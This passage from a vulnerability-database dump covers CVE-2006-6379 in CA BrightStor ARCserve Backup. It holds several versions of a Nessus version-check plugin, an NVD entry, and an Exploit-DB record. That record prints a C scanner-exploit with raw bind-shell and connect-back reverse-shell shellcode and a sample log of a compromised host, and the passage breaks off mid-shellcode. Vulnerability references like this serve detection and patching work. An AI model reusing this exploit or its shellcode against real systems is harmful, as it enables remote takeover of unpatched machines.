"bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2017-10-29T13:35:29", "modified": "2011-10-21T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2011/10/21 01:22:51 $\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n script_osvdb_id(30775);\n\n 
script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2011 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:35:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. 
\n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 1, "enchantments": {}, "hash": "cf38075e449d8db0fb98b349d7a03021ac275e893e81f779a9932b8cbb869b3b", "hashmap": [{"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "253070b2147836c5b000d6f0e62c8663", "key": "modified"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "7f3490b6cc1073c858e0dedd24527124", "key": "sourceData"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2016-09-26T17:23:48", "modified": "2011-10-21T00:00:00", "naslFamily": "Windows", "objectVersion": "1.2", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2011/10/21 01:22:51 $\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n script_osvdb_id(30775);\n\n script_name(english:\"CA BrightStor ARCserve 
Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2011 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:48"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "10b5ca3aa252884cd2c8c50302b4cf87"}, {"key": "cvelist", "hash": "afa83ac780a3bef839cd2eac311c3b43"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "adcf03de3f96ecb3a41330491bfe3999"}, {"key": "href", "hash": "ec68938fd283cbe4329e1a4083d56721"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "aea23489ce3aa9b6406ebb28e0cda430"}, {"key": "pluginID", "hash": "1c1b844e81f60edc6af816d8949a07b0"}, {"key": "published", "hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699"}, {"key": "references", "hash": "edd4a2e72a7e4c07d2c8b0ad00509f59"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "3df95bb580deecca3f439f8e778654f1"}, {"key": 
"title", "hash": "26328e0ecfef985ee1e44581d0630ce0"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "75c0846fb3bb817040772c6190b25fbcabf4e6d54eadb9db543a18477c9ad1f8", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6379"]}, {"type": "osvdb", "idList": ["OSVDB:30775"]}, {"type": "exploitdb", "idList": ["EDB-ID:1132"]}, {"type": "saint", "idList": ["SAINT:53FCF127771E89CD8C76DA47C3BF6B4B", "SAINT:8940368C56AF9FD6C894F29E6AE5EFBF", "SAINT:AFD0DC6204D54294BA0B227874738615"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15338"]}], "modified": "2019-01-16T20:07:03"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. 
\n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: 
QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "naslFamily": "Windows", "pluginID": "23841", "cpe": ["cpe:/a:ca:arcserve_backup"]}
{"cve": [{"lastseen": "2018-10-18T15:05:38", "bulletinFamily": "NVD", "description": "Buffer overflow in the BrightStor Backup Discovery Service in multiple CA products, including ARCserve Backup r11.5 SP1 and earlier, ARCserve Backup 9.01 up to 11.1, Enterprise Backup 10.5, and CA Server Protection Suite r2, allows remote attackers to execute arbitrary code via unspecified vectors.", "modified": "2018-10-17T17:47:58", "published": "2006-12-10T14:28:00", "id": "CVE-2006-6379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6379", "title": "CVE-2006-6379", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:36:34", "bulletinFamily": "exploit", "description": "CA BrightStor ARCserve Backup Auto Scanner / Exploiter. CVE-2006-6379. Remote exploit for windows platform", "modified": "2005-08-03T00:00:00", "published": "2005-08-03T00:00:00", "id": "EDB-ID:1132", "href": "https://www.exploit-db.com/exploits/1132/", "type": "exploitdb", "title": "CA BrightStor ARCserve Backup Auto Scanner / Exploiter", "sourceData": "/*\r\n * 02/20/2005\r\n *\r\n * This is provided as proof-of-concept code only for educational\r\n * purposes and testing by authorized individuals with permission\r\n * to do so.\r\n *\r\n * exploit by : cybertronic\r\n *\r\n * cybertronic[at]gmx[dot]net\r\n *\r\n * This exploits the following vulnerabilities:\r\n *\r\n * Computer Associates BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe\r\n * Computer Associates BrightStor ARCserve Backup Discovery Service - dsconfig.exe\r\n *\r\n * I included a vulnerability scanner, that scans for the bugs mentioned above\r\n * and logs to \"scan.log\" in working directory.\r\n * You have to adjust the timeout, it works fine on my network with\r\n * usec = 10000: ~10 hosts / sec\r\n *\r\n * some greetz fly to:\r\n * HD Moore - I`ll pay you some drinks, you know what they are for ;)\r\n * 
houseofdabus\r\n *\r\n * compile: gcc -o greetz_to_ca greetz_to_ca.c\r\n *\r\n * below is a screenshot of scan-mode:\r\n * __ __ _\r\n * _______ __/ /_ ___ _____/ /__________ ____ (_)____\r\n * / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/\r\n * / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__\r\n * \\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/\r\n * /____/\r\n *\r\n * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\r\n *\r\n * --[ choose\r\n * |\r\n * |--[0] = start scanner\r\n * `--[1] = send some greetings to ca\r\n *\r\n * $ 0\r\n *\r\n * --[ enter IP-range\r\n * |\r\n * |--[start-ip] $ 192.168.2.90\r\n * `--[end-ip ] $ 192.168.2.120\r\n *\r\n * --[ select port to scan for\r\n * |\r\n * |--[ 6070] = dbasqlr\r\n * `--[41523] = dsconfig\r\n *\r\n * $ 6070\r\n *\r\n * --[ I can try to exploit the bug, shall I ?\r\n * |\r\n * |--[0] yes, try it!\r\n * `--[1] no, i`am on my own!\r\n *\r\n * $ 0\r\n *\r\n * --[ select shellcode\r\n * |\r\n * |--[0] = bindshell\r\n * `--[1] = reverseshell\r\n *\r\n * $ 0\r\n *\r\n * oO---[ scanner - scan.log ]---Oo\r\n *\r\n * [192.168.2.90:6070] closed\r\n * [192.168.2.91:6070] closed\r\n * [192.168.2.92:6070] closed\r\n * [192.168.2.93:6070] closed\r\n * [192.168.2.94:6070] closed\r\n * [192.168.2.95:6070] closed\r\n * [192.168.2.96:6070] closed\r\n * [192.168.2.97:6070] closed\r\n * [192.168.2.98:6070] closed\r\n * [192.168.2.99:6070] closed\r\n * [192.168.2.100:6070] closed\r\n * [192.168.2.101:6070] open\r\n *\r\n\r\n// the first one is a fake service that was running by accident ( netcat -l -p 6070 )\r\n\r\n\r\n * oO---[ exploitation ]---Oo\r\n *\r\n * --[ connecting to 192.168.2.101:6070...done!\r\n * --[ exploiting dbasqlr.exe...\r\n * --[ sending packet [ 3288 bytes ]...done!\r\n * --[ sleeping 5 seconds...\r\n * --[ connecting to 192.168.2.101:4444...failed!\r\n *\r\n * [192.168.2.102:6070] open\r\n *\r\n * oO---[ exploitation ]---Oo\r\n *\r\n * --[ connecting to 
192.168.2.102:6070...done!\r\n * --[ exploiting dbasqlr.exe...\r\n * --[ sending packet [ 3288 bytes ]...done!\r\n * --[ sleeping 5 seconds...\r\n * --[ connecting to 192.168.2.102:4444...done!\r\n * --[ b0x pwned - h4ve phun\r\n * Microsoft Windows XP [Version 5.1.2600]\r\n * (C) Copyright 1985-2001 Microsoft Corp.\r\n *\r\n * C:\\WINDOWS\\system32>exit\r\n * exit\r\n * bye bye...\r\n * [192.168.2.103:6070] closed\r\n * [192.168.2.104:6070] closed\r\n * [192.168.2.105:6070] closed\r\n * [192.168.2.106:6070] closed\r\n * [192.168.2.107:6070] closed\r\n * [192.168.2.108:6070] closed\r\n * [192.168.2.109:6070] closed\r\n * [192.168.2.110:6070] closed\r\n * [192.168.2.111:6070] closed\r\n * [192.168.2.112:6070] closed\r\n * [192.168.2.113:6070] closed\r\n * [192.168.2.114:6070] closed\r\n * [192.168.2.115:6070] closed\r\n * [192.168.2.116:6070] closed\r\n * [192.168.2.117:6070] closed\r\n * [192.168.2.118:6070] closed\r\n * [192.168.2.119:6070] closed\r\n * [192.168.2.120:6070] closed\r\n *\r\n * oO---[ scan completed ]---Oo\r\n *\r\n * [ cybertronic @ CA ] #\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n\r\n/*\r\n *\r\n * definitions\r\n *\r\n */\r\n\r\n#define PORT_DBASQLR\t6070\r\n#define PORT_DSCONFIG\t41523\r\n\r\n#define RED\t\t\"\\E[31m\\E[1m\"\r\n#define GREEN\t\"\\E[32m\\E[1m\"\r\n#define YELLOW\t\"\\E[33m\\E[1m\"\r\n#define BLUE\t\"\\E[34m\\E[1m\"\r\n#define NORMAL\t\"\\E[m\"\r\n\r\n/*\r\n *\r\n * prototypes\r\n *\r\n */\r\n\r\nint connect_to_remote_host ( char* tip, unsigned short tport );\r\nint exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );\r\nint exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );\r\nint isip ( char *ip );\r\nint is_open ( char* ip, unsigned short tport );\r\nint 
select_action ();\r\nint select_shellcode ();\r\nint select_vulnerability ();\r\nint shell ( int s, char* tip, unsigned short cbport );\r\n\r\nvoid connect_to_bindshell ( char* tip, unsigned short bport );\r\nvoid fall_asleep ( int sec );\r\nvoid header ();\r\nvoid start_reverse_handler ( int cbport );\r\nvoid usage ( char* name );\r\n\r\n/*********************\r\n * Windows Shellcode *\r\n *********************/\r\n\r\n/*\r\n * Type : bind shellcode\r\n * Length: 500 bytes\r\n * Port : 4444 / 0x115c\r\n *\r\n */\r\n\r\nunsigned char bindshell[] =\r\n\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\"\r\n\"\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\r\n\"\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\"\r\n\"\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\"\r\n\"\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\"\r\n\"\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\"\r\n\"\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\"\r\n\"\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\"\r\n\"\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\"\r\n\"\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\"\r\n\"\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\"\r\n\"\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\"\r\n\"\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x
24\\xc5\\xd3\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\"\r\n\"\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\"\r\n\"\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\"\r\n\"\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\"\r\n\"\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\"\r\n\"\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\"\r\n\"\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\"\r\n\"\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\"\r\n\"\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\"\r\n\"\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\"\r\n\"\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\"\r\n\"\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\"\r\n\"\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\"\r\n\"\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\"\r\n\"\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\"\r\n\"\\x80\\x2f\\xa2\\x04\";\r\n\r\n/*\r\n * Type : connect back shellcode\r\n * Length: 316 bytes\r\n * CBIP : reverseshell[111] ( ^ 0x99999999 )\r\n * CBPort: reverseshell[118] ( ^ 0x9999 )\r\n *\r\n */\r\n\r\nunsigned char reverseshell[] 
=\r\n\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"\r\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\"\r\n\"\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\"\r\n\"\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\"\r\n\"\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\"\r\n\"\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\"\r\n\"\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\"\r\n\"\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\"\r\n\"\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\"\r\n\"\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\"\r\n\"\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\"\r\n\"\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\"\r\n\"\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\"\r\n\"\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\"\r\n\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"\r\n\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\"\r\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3